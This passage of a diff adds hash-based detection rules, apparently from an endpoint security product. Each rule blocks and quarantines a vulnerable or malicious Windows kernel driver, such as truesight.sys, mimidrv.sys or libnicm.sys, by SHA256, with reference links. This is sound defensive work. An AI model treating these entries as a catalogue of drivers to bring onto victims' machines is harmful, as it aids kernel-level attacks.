"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611779Z", + "creation_date": "2026-03-23T11:45:29.611781Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611786Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz141_x64.sys) [CVE-2017-15303] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9bb2fcd0-b870-5e90-87fc-ad499d38ace3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831549Z", + "creation_date": "2026-03-23T11:45:30.831551Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831556Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cbb16ed786b6aa2114c413f32b479fb0ad32ef51c3ed2a3bf246c64cc67a2f71", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9bb54a80-8b45-5b34-9847-4885ef01f70d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466413Z", + "creation_date": "2026-03-23T11:45:30.466417Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466425Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "02ebf848fa618eba27065db366b15ee6629d98f551d20612ac38b9f655f37715", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9bd20355-6307-566d-9c70-4e7bc74e3dd0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836433Z", + "creation_date": "2026-03-23T11:45:30.836435Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.836441Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4f38278507925c3b52ed85bc8c9c59ae7165d250c2214ff828e8ff3873e39853", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9bd5fc0f-1d94-5c27-976b-8a7e882016d2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826102Z", + "creation_date": "2026-03-23T11:45:31.826104Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826110Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8713acee437abc90d03bc765a51b27cd4e4b1525d191a499e10d0baad1cd4093", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9bdac16c-a7db-50be-8c83-56ee90347f86", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815347Z", + "creation_date": "2026-03-23T11:45:31.815349Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815355Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd3307c8636e6789a1ccc4c7906b37d36daa4caa25049e50d40eb66b88a28e90", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9bde7ebb-5a82-52aa-8a92-097be6674b6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975621Z", + "creation_date": "2026-03-23T11:45:29.975623Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975629Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e16dc51c51b2df88c474feb52ce884d152b3511094306a289623de69dedfdf48", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9bdf68fd-ee79-5447-bb0f-7d4d6c091a4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823472Z", + "creation_date": "2026-03-23T11:45:31.823475Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823484Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05db222530d33503428366d5fb29a78944343a4fb6491a3814f7e2183671f678", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9be150ae-3697-522b-b0d8-7153e97599d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493418Z", + "creation_date": "2026-03-23T11:45:31.493420Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493425Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "64f6d15237777c9c3eaa1cde000093e324309d74a15394c7f6aa384c6b0322c2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9bf0ff35-5438-59da-b98f-87d679a8172c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464452Z", + "creation_date": "2026-03-23T11:45:30.464455Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464463Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"8b32fc8b15363915605c127ccbf5cbe71778f8dfbf821a25455496e969a01434", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c04a409-d24a-51fd-8249-9801f939971a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473085Z", + "creation_date": "2026-03-23T11:45:31.473089Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473098Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c11bd3609173965808776513612dc0607b34b949e21331cf470d5c585b20f3e8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c084e42-f113-586a-8c3c-3b094b5d4cd9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" 
+ }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144634Z", + "creation_date": "2026-03-23T11:45:31.144636Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144641Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "886aa9c69a2a14e6eccdad7cbb1bbcab8413307c64c746d63d5666d2e10b31ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c09aeae-0810-5134-b61b-abad8b226c0c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830277Z", + "creation_date": "2026-03-23T11:45:30.830279Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830284Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da41cb1410c171dcda483cd1930922aa08385446a452a070f898ce98d3e1741b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c2508d4-c75f-5f5f-ab3e-42051fdc65ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476214Z", + "creation_date": "2026-03-23T11:45:30.476217Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476226Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "87e094214feb56a482cd8ae7ee7c7882b5a8dccce7947fdaa04a660fa19f41e5", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c251594-9097-508f-860e-851f557c1231", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979082Z", + "creation_date": "2026-03-23T11:45:29.979084Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979089Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23ba19352b1e71a965260bf4d5120f0200709ee8657ed381043bec9a938a1ade", + "comment": "Vulnerable Kernel Driver (aka LHA.sys) [https://www.loldrivers.io/drivers/eb07ef7e-0402-48eb-8e06-8fb76eda5b84/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c3375b7-0084-5b14-8688-43c77eda146d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143910Z", + "creation_date": "2026-03-23T11:45:31.143912Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143917Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a6611470131d2bf9f571217bc83ab77e4e8cfa6cd08c6b4b6994a9b045d0a93d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c383a0c-a508-50c9-81e6-2ff68fdd2fb5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463270Z", + "creation_date": "2026-03-23T11:45:30.463273Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463282Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec96b15ce218f97ec1d8f07f13b052d274c4c8438f31daf246ccfaaee5e1bebd", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c395aa1-3474-5231-b2cd-5db1377a70e4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832279Z", + "creation_date": "2026-03-23T11:45:30.832281Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832287Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, 
+ "references": [], + "type": "hash", + "value": "e7e0b9ee449be3f6af44d4bc962e5b8e7bcd2fc657796c257a6234920c68ab27", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c3e97d9-1dce-577b-82e5-2090f5c0c7b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150479Z", + "creation_date": "2026-03-23T11:45:31.150480Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150486Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "381463e3020706e124291c7a6d0df2fbee49e2f695fb8dc027d4ebb03f30134b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c3ead8f-2cac-5be6-85e3-3c5667f1add9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143077Z", + "creation_date": "2026-03-23T11:45:31.143079Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143085Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e7ed5283aa462d89ca12960b6fccad1d86cd3b9bcda9b9e532f937f634950a43", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c5e7a68-a056-517f-bc63-f8d6189e85c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156345Z", + "creation_date": "2026-03-23T11:45:31.156347Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156352Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f4fe055699c47493921717525e1939c3b4426c65efd1f2e922eefff5c1d3ac20", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c6d76dc-d377-54bd-8936-126268ea8465", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488776Z", + "creation_date": "2026-03-23T11:45:31.488778Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488784Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b84b2161ca1515e4d503a1ddd8fed1c995e2f4f45ece1f5504059ecf7ea5360", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c841118-5e96-53b8-8556-66bb845ce94e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459547Z", + "creation_date": "2026-03-23T11:45:30.459551Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459571Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e94e8a87459db56837d1c58f9854794aa99f36566a9ded9b398be9d4d3a2c2af", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c88dbcd-516e-5c3f-9310-905534e65e98", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984804Z", + "creation_date": "2026-03-23T11:45:29.984806Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984811Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "913ab7134ea3460e76db753cf68f336ada8f0b9c397be88c75f9567a8694f4a5", + "comment": "Dangerous Physmem Kernel Driver (aka AsrRapidStartDrv.Sys) [https://www.loldrivers.io/drivers/19d16518-4aee-4983-ba89-dbbe0fa8a3e7/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c97c4a0-6717-589d-9ada-2d68e24d8f46", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813740Z", + "creation_date": "2026-03-23T11:45:31.813742Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813747Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e32f82241a529082fe33a4bfbd949a50c8ef947f4742cfa4027143afc051784", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 